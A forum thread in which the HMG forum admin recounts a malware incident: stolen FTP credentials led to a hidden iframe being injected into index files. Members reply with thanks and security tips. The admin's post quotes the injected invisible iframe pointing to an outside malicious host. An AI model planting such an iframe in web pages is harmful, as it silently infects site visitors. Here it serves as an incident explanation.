A Tough time for HMG Forum
Moderator: Rathinagiri
- Rathinagiri
- Posts: 5471
- Joined: Tue Jul 29, 2008 6:30 pm
- DBs Used: MariaDB, SQLite, SQLCipher and MySQL
- Location: Sivakasi, India
- Contact:
A Tough time for HMG Forum
Hi all,
It is really a tough time for our forum.
It gives me relief that we had recovered from a major disaster. Now we are running from a sophisticated, exclusive server space for our HMGForum
Let me tell you the details soon.
As of now, only the forum is working. The following are not.
- HMG Site (for downloading the latest version) - This is my first priority.
- Files uploaded by members to our forum.
- HMG Wiki
I am just working on these things. I will inform once it is over.
Regards,
S. Rathinagiri.
It is really a tough time for our forum.
It gives me relief that we had recovered from a major disaster. Now we are running from a sophisticated, exclusive server space for our HMGForum
Let me tell you the details soon.
As of now, only the forum is working. The following are not.
- HMG Site (for downloading the latest version) - This is my first priority.
- Files uploaded by members to our forum.
- HMG Wiki
I am just working on these things. I will inform once it is over.
Regards,
S. Rathinagiri.
East or West HMG is the Best.
South or North HMG is worth.
...the possibilities are endless.
South or North HMG is worth.
...the possibilities are endless.
- esgici
- Posts: 4543
- Joined: Wed Jul 30, 2008 9:17 pm
- DBs Used: DBF
- Location: iskenderun / Turkiye
- Contact:
Re: A Tough time for HMG Forum
Hi Rathi
Hearty thanks for your trouble you are enduring for us
Please let me know anything I will can make.
Best regards
--
Esgici
Hearty thanks for your trouble you are enduring for us
Please let me know anything I will can make.
Best regards
--
Esgici
Viva INTERNATIONAL HMG
- Roberto Lopez
- HMG Founder
- Posts: 4004
- Joined: Wed Jul 30, 2008 6:43 pm
Re: A Tough time for HMG Forum
Thanks for all your hard work.rathinagiri wrote:Hi all,
It is really a tough time for our forum.
It gives me relief that we had recovered from a major disaster. Now we are running from a sophisticated, exclusive server space for our HMGForum
Let me tell you the details soon.
As of now, only the forum is working. The following are not.
- HMG Site (for downloading the latest version) - This is my first priority.
- Files uploaded by members to our forum.
- HMG Wiki
I am just working on these things. I will inform once it is over.
Regards,
S. Rathinagiri.
Regards/Saludos,
Roberto
(Veritas Filia Temporis)
Roberto
(Veritas Filia Temporis)
Re: A Tough time for HMG Forum
Thank you friend Rathi. We are proud of you for your dedication and hard work
With best regards,
Sudip
Sudip
- luisvasquezcl
- Posts: 1258
- Joined: Thu Jul 31, 2008 3:23 am
- Location: Chile
- Contact:
Re: A Tough time for HMG Forum
Estimado amigo,
muchas gracias por su esfuerzo y dedicación.
saludos cordiales,
Luis Vasquez.
muchas gracias por su esfuerzo y dedicación.
saludos cordiales,
Luis Vasquez.
- Rathinagiri
- Posts: 5471
- Joined: Tue Jul 29, 2008 6:30 pm
- DBs Used: MariaDB, SQLite, SQLCipher and MySQL
- Location: Sivakasi, India
- Contact:
Re: A Tough time for HMG Forum
I wish to share my nightmare experience with you now.
My sites (including my personal web site) are hosted in http://www.hostmonster.com (Yes, the famous so called unlimited web space, unlimited bandwidth, unlimited add-on domains... giving web hosting server).
HMGForum was also one of the sites hosted there. Yesterday at about 11 p.m. I'd found out that, my sites were suspended to safeguard against malware. I had immediately contacted their support and they asked me to clean the malware affected files. Our site was affected by iframe injection attack on index.html/php files. More details of this malware can be seen from here.
Now, it is so ridiculous how this malware is injected in the site. It is because of a security hole in Adobe PDF Reader (below version 9.1). When you open an affected PDF (Yes! PDF files may also contain JavaScript malwares!) using Adobe Reader, using some javascript, it finds out all the ftp accounts and passwords and sends to a common server! That common culprit server periodically logs into these ftp accounts, downloads index.html and index.php files, injects a code like the one below:
<iframe src="http://internetcountercheck.com/?click=7158656" width=1
height=1 style="visibility:hidden;position:absolute"></iframe>
Once this is injected in the main index file, whenever somebody visits the site, they will be downloading some worms. So, it goes on like this. That's why I am using Sumatra PDF reader for opening PDF files. Now, we should never save ftp account username/password anywhere in computer, except our mind.
Coming to our tragedy, I worked about 3 hours and it was 3 a.m. in the morning, I checked each and every html/php file for this malicious code and found them in 3 files only. I had removed them and uploaded the clean copy. In spite of doing all this, the web hosting company didn't activate the account. They have asked me to ensure that there is no security holes by again thoroughly checking the php and html codes. I said them, I know only HMG and not php and html...
All the software I use are PHPBB, Joomla and Moodle. All of them are open source and are even distributed by these web hosting companies. Now, how can I check 1000s of files for some security holes?! Even the software are regularly updated as and when new versions are released. I am really dissatisfied with the service provided by them. So, our site was down for a long 13 hours.
So, I have decided to go for a dedicated service for our forum. Now, I have transferred all the contents to a new server fully managed by one of my friends. Here, we got an exclusive account for hmgforum and not mingled with any other site. Here we have 20 GB of hard disk (Now we have 300 MB with all database, software, uploaded files put together). I think that this would be enough for us for the near future.
As of now, all the files uploaded by the members are recovered and uploaded to the new server. HMG Download site is also recovered. However, only the latest version can be downloaded. Other versions I have to download from the old server and upload to the new server.
If you have any problem with this new server, please contact me immediately. Thanks for your patience.
My sites (including my personal web site) are hosted in http://www.hostmonster.com (Yes, the famous so called unlimited web space, unlimited bandwidth, unlimited add-on domains... giving web hosting server).
HMGForum was also one of the sites hosted there. Yesterday at about 11 p.m. I'd found out that, my sites were suspended to safeguard against malware. I had immediately contacted their support and they asked me to clean the malware affected files. Our site was affected by iframe injection attack on index.html/php files. More details of this malware can be seen from here.
Now, it is so ridiculous how this malware is injected in the site. It is because of a security hole in Adobe PDF Reader (below version 9.1). When you open an affected PDF (Yes! PDF files may also contain JavaScript malwares!) using Adobe Reader, using some javascript, it finds out all the ftp accounts and passwords and sends to a common server! That common culprit server periodically logs into these ftp accounts, downloads index.html and index.php files, injects a code like the one below:
<iframe src="http://internetcountercheck.com/?click=7158656" width=1
height=1 style="visibility:hidden;position:absolute"></iframe>
Once this is injected in the main index file, whenever somebody visits the site, they will be downloading some worms. So, it goes on like this. That's why I am using Sumatra PDF reader for opening PDF files. Now, we should never save ftp account username/password anywhere in computer, except our mind.
Coming to our tragedy, I worked about 3 hours and it was 3 a.m. in the morning, I checked each and every html/php file for this malicious code and found them in 3 files only. I had removed them and uploaded the clean copy. In spite of doing all this, the web hosting company didn't activate the account. They have asked me to ensure that there is no security holes by again thoroughly checking the php and html codes. I said them, I know only HMG and not php and html...
All the software I use are PHPBB, Joomla and Moodle. All of them are open source and are even distributed by these web hosting companies. Now, how can I check 1000s of files for some security holes?! Even the software are regularly updated as and when new versions are released. I am really dissatisfied with the service provided by them. So, our site was down for a long 13 hours.
So, I have decided to go for a dedicated service for our forum. Now, I have transferred all the contents to a new server fully managed by one of my friends. Here, we got an exclusive account for hmgforum and not mingled with any other site. Here we have 20 GB of hard disk (Now we have 300 MB with all database, software, uploaded files put together). I think that this would be enough for us for the near future.
As of now, all the files uploaded by the members are recovered and uploaded to the new server. HMG Download site is also recovered. However, only the latest version can be downloaded. Other versions I have to download from the old server and upload to the new server.
If you have any problem with this new server, please contact me immediately. Thanks for your patience.
East or West HMG is the Best.
South or North HMG is worth.
...the possibilities are endless.
South or North HMG is worth.
...the possibilities are endless.
- srvet_claudio
- Posts: 2193
- Joined: Thu Feb 25, 2010 8:43 pm
- Location: Uruguay
- Contact:
Re: A Tough time for HMG Forum
Hello Friend Rathi, you're a great man.
Thank you very much, thank you very much, thank you very much !!!
to keep this forum alive.
A fraternal greeting,
Claudio Soto.
Thank you very much, thank you very much, thank you very much !!!
to keep this forum alive.
A fraternal greeting,
Claudio Soto.
Re: A Tough time for HMG Forum
Rathi thank you very much for your dedication.
I absolutely sure hmgforum is one of the causes of HMG success.
Best Regards
Angel
I absolutely sure hmgforum is one of the causes of HMG success.
Best Regards
Angel
Angel Pais
Web Apps consultant/architect/developer.
Web Apps consultant/architect/developer.
Re: A Tough time for HMG Forum
Rathi:
Por favor, no tienes de qué disculparte. El esfuerzo que haces no solo en esta ocación sino a diario, es valorado por todos.
Sinceramente, muchas gracias.
Rathi:
Please do not have to apologize. The effort you make not only in this occasion but every day, is valued by all.
Sincerely, thank you very much.
Por favor, no tienes de qué disculparte. El esfuerzo que haces no solo en esta ocación sino a diario, es valorado por todos.
Sinceramente, muchas gracias.
Rathi:
Please do not have to apologize. The effort you make not only in this occasion but every day, is valued by all.
Sincerely, thank you very much.
Saludos, Fernando Chirico.
- Roberto Lopez
- HMG Founder
- Posts: 4004
- Joined: Wed Jul 30, 2008 6:43 pm
Re: A Tough time for HMG Forum
It require some effort, but when you are dealing with sensitive information (web sites FTP, home banking, etc.) , is preferable to boot from an Ubuntu CD.
Until now, I've done for home banking only, but from now I'll do for web sites FTP too.
With Ubuntu CD, since the system can't be modified, I guess that could be the best choice (boot, do your thing and shutdown).
Thanks again for all your efforts.
Until now, I've done for home banking only, but from now I'll do for web sites FTP too.
With Ubuntu CD, since the system can't be modified, I guess that could be the best choice (boot, do your thing and shutdown).
Thanks again for all your efforts.
Regards/Saludos,
Roberto
(Veritas Filia Temporis)
Roberto
(Veritas Filia Temporis)